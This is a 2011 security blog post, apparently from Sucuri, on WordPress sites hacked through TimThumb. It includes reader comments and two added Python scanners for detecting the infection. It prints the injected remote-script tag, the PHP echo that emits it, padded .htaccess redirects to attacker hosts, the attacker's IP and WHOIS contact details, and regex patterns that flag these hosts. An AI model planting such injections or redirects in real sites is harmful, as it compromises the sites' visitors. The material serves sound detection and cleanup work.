WordPress Sites Hacked with Superpuperdomain2.com

August 13, 2011 by David Dede


A few days ago we posted about a series of attacks that were happening against WordPress sites running the vulnerable timthumb.php script.

We detected thousands of sites compromised by it, and now we are seeing a small change in the malware. Instead of superpuperdomain.com, the malware now loads a remote JavaScript file from superpuperdomain2.com (note the extra 2). This is what shows up on the compromised sites:

<script language="javascript" SRC="http://superpuperdomain2.com/count.php?ref="

That code is generated by an echo statement hidden within one of the WordPress core files, and it is always accompanied by multiple backdoors and even .htaccess redirections (to http://generation-internet.ru and other Russian sites). Because the tag is emitted by PHP rather than stored in a post or template, searching only the database or the theme will miss it; check the core files too.

Both domains were registered under the same name, Archil Karsaulidze (probably fake), and point to the same IP address, 91.196.216.20:

Archil Karsaulidze admin@superpuperdomain.com
+74957261532 fax: +74957261532
Novopeschanaya, 3-28
Moscow Moscowscaya Oblast 107263
ru
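The indicators above (the injected script tag, the PHP echo that emits it, the .htaccess redirects, and the shared domains and IP) can be turned into a file scan. The following is an added example, not code from the Sucuri post: it walks a WordPress tree, or a path-to-text mapping, and reports which indicator matched in which file. The sample site contents are constructed for the demonstration, and the echo pattern assumes the tag is emitted by a plain echo or print (an obfuscated variant would need decoding first).

```python
"""Scan a WordPress tree for the superpuperdomain/TimThumb infection
indicators described in the post. Added example; not Sucuri code."""
import os
import re

# Indicators taken from the post. Order matters only for the report.
INDICATORS = [
    # the injected <script ... SRC="http://superpuperdomain2.com/count.php?ref=..."> tag
    ("superpuperdomain-script", re.compile(
        r'<script[^>]*\bsrc\s*=\s*["\']?https?://superpuperdomain2?\.com/count\.php', re.I)),
    # a PHP echo/print statement that emits the tag (the hidden core-file injection)
    ("superpuperdomain-echo", re.compile(
        r'\b(?:echo|print)\b[^;]*superpuperdomain2?\.com', re.I)),
    # an .htaccess redirect to the Russian site or the shared IP
    ("htaccess-redirect", re.compile(
        r'^\s*(?:RewriteRule|Redirect\w*)\b.*?(?:generation-internet\.ru|91\.196\.216\.20)',
        re.I | re.M)),
    # any other mention of the attacker infrastructure (backdoor config, etc.)
    ("known-bad-host", re.compile(
        r'superpuperdomain2?\.com|generation-internet\.ru|91\.196\.216\.20', re.I)),
]

# Constructed sample site: one injected core file, one redirecting .htaccess,
# one static page carrying the tag, and one clean theme file.
SAMPLE_SITE = {
    "wp-includes/general-template.php": (
        "<?php\nfunction wp_footer() {\n    do_action('wp_footer');\n"
        "    echo '<script language=\"javascript\" SRC=\"http://superpuperdomain2.com/count.php?ref=\"></script>';\n"
        "}\n"),
    "wp-content/themes/mytheme/.htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} google\\. [NC]\n"
        "RewriteRule ^(.*)$ http://generation-internet.ru/ [R=301,L]\n"),
    "wp-content/themes/mytheme/functions.php": "<?php\nadd_theme_support('post-thumbnails');\n",
    "index.html": ('<html><body><script language="javascript" '
                   'SRC="http://superpuperdomain2.com/count.php?ref="></script></body></html>'),
}


def scan_text(text):
    """Return the names of every indicator that matches the given file text."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_tree(files):
    """files: mapping of relative path -> file text. Returns {path: [indicators]}
    containing only the files with at least one hit."""
    findings = {}
    for path, content in files.items():
        hits = scan_text(content)
        if hits:
            findings[path] = hits
    return findings


def scan_directory(root):
    """Read PHP, HTML, JS and .htaccess files under root and scan them."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith((".php", ".html", ".js")) or name == ".htaccess":
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        files[os.path.relpath(full, root).replace(os.sep, "/")] = fh.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
    return scan_tree(files)


if __name__ == "__main__":
    import sys
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_tree(SAMPLE_SITE)
    for path, hits in sorted(results.items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it with the WordPress document root as the only argument to scan a real install; with no argument it scans the constructed sample. A hit on `superpuperdomain-echo` in a file under wp-includes or wp-admin is the core-file injection the post describes, and the fix there is to restore the file from a clean WordPress release rather than editing it by hand.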

How are the sites getting compromised?

On the sites we have analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a number of backdoors to maintain their access to the hacked sites, so removing only the injected script is not enough; the backdoors have to go as well.

If you are using the timthumb.php script, remove or update it now!

Keeping yourself secure

This is not a vulnerability in WordPress itself; it is a vulnerability in the many WordPress themes that bundle TimThumb. Make sure you are using an up-to-date theme obtained from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that its authors may never get around to fixing.

If you are not sure, you can do a free scan of your site using Sucuri SiteCheck.


Categories: Vulnerability Disclosure, Website Malware Infections, WordPress Security
Tags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. MaXe

    August 14, 2011

    If you’re unsure what the filename for “timthumb” is, as it may have been renamed, log into the server and issue this command: (Thanks to rAWjAW)
    find . -name '*.php' -print0 | xargs -0 grep -s timthumb

    It will find any PHP file with the word “timthumb” within it. (Your site may be vulnerable even though there’s no such filename as timthumb.php. The filename does not matter, as the theme developer could’ve just renamed the file. Kinda like renaming a program named trojan.exe to screensaver.exe: the contents do not change.)

    ~ MaXe

  2. Sharklauncher

    August 16, 2011

    If you don’t see any of the above backdoors, do the following:

    1. Patch your thumb.php/timthumb.php files.

    2. Search and remove (back up first) any files in your theme directories named the following: “log.php”, “sm3.php”, “wp.php”, “r1.php”, “data.php”, and “stats.php”.  

    You may want to verify that they’re not valid files before deletion.

    3. Edit your .htaccess files and remove everything below the standard WordPress options (there is “hidden” redirect code way off to the lower right).
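The two comments above describe a manual triage: find TimThumb by content rather than filename (MaXe), then look for the dropped files and the hidden .htaccess code (Sharklauncher). The following is an added example, not code from the post or its commenters, that carries those steps out programmatically on a path-to-text mapping of the site. It reads TimThumb's `define ('VERSION', ...)` line so you can compare against the patched release, but does not itself decide which versions are safe; the list of suspect file names comes from the comment; the 40-character whitespace threshold for "pushed off to the right" is an assumption; and the `# END WordPress` marker is the one WordPress writes around its own rewrite rules. The sample tree is constructed for the demonstration.

```python
"""Programmatic version of the comment-thread triage steps. Added example;
not code from Sucuri or the commenters."""
import os
import re

# TimThumb copies are found by content, since the file may be renamed.
TIMTHUMB_MARKER = re.compile(r"timthumb", re.I)
# TimThumb declares its version as: define ('VERSION', '1.xx');
VERSION_RX = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")
# File names the comment reports as dropped into theme directories.
SUSPECT_NAMES = {"log.php", "sm3.php", "wp.php", "r1.php", "data.php", "stats.php"}
# Assumption: 40+ whitespace characters between two tokens on one line is
# the "way off to the lower right" hiding trick, not normal formatting.
HIDDEN_PAD = re.compile(r"\S\s{40,}\S")
END_WP = "# END WordPress"

# Constructed sample: a TimThumb under its usual name, a renamed copy, a
# dropped stats.php in the theme, a same-named legitimate plugin file, and
# an .htaccess with a padded redirect appended after the WordPress block.
SAMPLE_SITE = {
    "wp-content/themes/mytheme/thumb.php": "<?php\n// TimThumb script\ndefine ('VERSION', '1.33');\n",
    "wp-content/themes/mytheme/lib/image.php": "<?php\n/* renamed timthumb copy */\ndefine ('VERSION', '1.25');\n",
    "wp-content/themes/mytheme/functions.php": "<?php\nadd_theme_support('post-thumbnails');\n",
    "wp-content/themes/mytheme/stats.php": "<?php\n// constructed stand-in for a dropped file\n",
    "wp-content/plugins/seo/stats.php": "<?php\n// legitimate plugin file that happens to share the name\n",
    ".htaccess": (
        "# BEGIN WordPress\n"
        "<IfModule mod_rewrite.c>\n"
        "RewriteEngine On\n"
        "RewriteBase /\n"
        "RewriteRule ^index\\.php$ - [L]\n"
        "</IfModule>\n"
        "# END WordPress\n"
        "\n"
        "RewriteCond %{HTTP_REFERER} google [NC]" + " " * 200
        + "RewriteRule ^(.*)$ http://generation-internet.ru/ [R,L]\n"
    ),
}


def find_timthumb(files):
    """Return {path: version-or-None} for every PHP file containing 'timthumb'."""
    out = {}
    for path, text in files.items():
        if path.endswith(".php") and TIMTHUMB_MARKER.search(text):
            m = VERSION_RX.search(text)
            out[path] = m.group(1) if m else None
    return out


def suspect_theme_files(files):
    """Theme-directory files whose names match the comment's list (verify before deleting)."""
    return sorted(p for p in files
                  if "/themes/" in p and os.path.basename(p) in SUSPECT_NAMES)


def htaccess_anomalies(text):
    """(line number, reason) for lines after '# END WordPress' or hidden behind padding."""
    findings = []
    after_end = False
    for lineno, line in enumerate(text.splitlines(), 1):
        if after_end and line.strip():
            findings.append((lineno, "after-END-WordPress"))
        if HIDDEN_PAD.search(line):
            findings.append((lineno, "whitespace-padded"))
        if line.strip() == END_WP:
            after_end = True
    return findings


def triage(files):
    """Run all three checks over a path -> text mapping."""
    htaccess = {}
    for path, text in files.items():
        if os.path.basename(path) == ".htaccess":
            anomalies = htaccess_anomalies(text)
            if anomalies:
                htaccess[path] = anomalies
    return {
        "timthumb_copies": find_timthumb(files),
        "suspect_theme_files": suspect_theme_files(files),
        "htaccess": htaccess,
    }


if __name__ == "__main__":
    for section, result in triage(SAMPLE_SITE).items():
        print(f"{section}: {result}")
```

The mapping is the same shape a short `os.walk` loop over the document root produces (relative path to file text), so the functions run unchanged against a real install. Treat `suspect_theme_files` as a list to review, not to delete blindly, exactly as the comment says; and when `htaccess_anomalies` reports a padded line, open the file with line wrapping off to see what is hidden at the far right before removing it.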

  3. Carol

    August 22, 2011

    Wow, how scary.  Even websites aren’t safe. Thank you for this!

  4. John Overall

    August 23, 2011

    You may also want to add the plugin WordPress File Monitor Plus to monitor all changes to your site. This plugin is fantastic for monitoring your site for any unusual changes.

    John Overall
